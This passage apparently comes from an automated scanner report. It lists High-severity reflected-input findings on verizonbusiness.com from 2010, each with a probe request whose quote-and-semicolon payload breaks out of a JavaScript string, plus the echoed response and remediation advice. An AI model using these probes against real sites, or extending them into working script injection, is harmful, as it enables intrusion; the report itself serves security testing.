This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news82892"%3b3b168ef6b79/podcasts/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:45 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47099
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news82892";3b168ef6b79/podcasts/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.379. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5aa2"%3b86cfc1c3fc0 was submitted in the REST URL parameter 3. This input was echoed as a5aa2";86cfc1c3fc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/podcastsa5aa2"%3b86cfc1c3fc0/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:22 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49747
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/podcastsa5aa2";86cfc1c3fc0/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.380. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eb44'%3b19771e789d was submitted in the REST URL parameter 3. This input was echoed as 4eb44';19771e789d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/podcasts4eb44'%3b19771e789d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:54 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49745
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/podcasts4eb44';19771e789d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.381. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a47"%3b9a99c654d35 was submitted in the REST URL parameter 1. This input was echoed as 92a47";9a99c654d35 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about92a47"%3b9a99c654d35/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:36 GMT
Content-Type: text/html
Content-Length: 40788
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about92a47";9a99c654d35/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE
...[SNIP]...

1.382. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e002a'%3be3779b534a1 was submitted in the REST URL parameter 1. This input was echoed as e002a';e3779b534a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboute002a'%3be3779b534a1/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40788
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/aboute002a';e3779b534a1/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.len
...[SNIP]...

1.383. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 132b5'%3b72fa7706189 was submitted in the REST URL parameter 2. This input was echoed as 132b5';72fa7706189 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news132b5'%3b72fa7706189/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:52:44 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47247
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news132b5';72fa7706189/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.384. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cced8"%3b38d7f9e0386 was submitted in the REST URL parameter 2. This input was echoed as cced8";38d7f9e0386 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newscced8"%3b38d7f9e0386/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47247
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newscced8";38d7f9e0386/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIA
...[SNIP]...

1.385. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7418'%3ba7b518847bf was submitted in the REST URL parameter 3. This input was echoed as c7418';a7b518847bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/c7418'%3ba7b518847bf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:37 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/c7418';a7b518847bf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.386. http://www.verizonbusiness.com/about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25633-en-Verizon+Business+Offers+New+Insight+Into+Enterprise+Security+Risk+Management.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a84d7"%3b7df8aeca3f4 was submitted in the REST URL parameter 3. This input was echoed as a84d7";7df8aeca3f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/a84d7"%3b7df8aeca3f4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:56 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/a84d7";7df8aeca3f4";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.387. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e016"%3b029185a9346 was submitted in the REST URL parameter 1. This input was echoed as 9e016";029185a9346 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about9e016"%3b029185a9346/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:55 GMT
Content-Type: text/html
Content-Length: 40854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about9e016";029185a9346/news/pr-25634-en-Verizon Business Earns Telemark.s `World Class. Ranking Among Information Communications Technology Providers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT C
...[SNIP]...

1.388. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab8db'%3b0339a38bc2d was submitted in the REST URL parameter 1. This input was echoed as ab8db';0339a38bc2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutab8db'%3b0339a38bc2d/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:06 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutab8db';0339a38bc2d/news/pr-25634-en-Verizon Business Earns Telemark.s `World Class. Ranking Among Information Communications Technology Providers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=n
...[SNIP]...

1.389. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1020d'%3b9a005eb3c7c was submitted in the REST URL parameter 2. This input was echoed as 1020d';9a005eb3c7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news1020d'%3b9a005eb3c7c/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news1020d';9a005eb3c7c/pr-25634-en-Verizon Business Earns Telemark..s `World Class.. Ranking Among Information Communications Technology Providers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new
...[SNIP]...

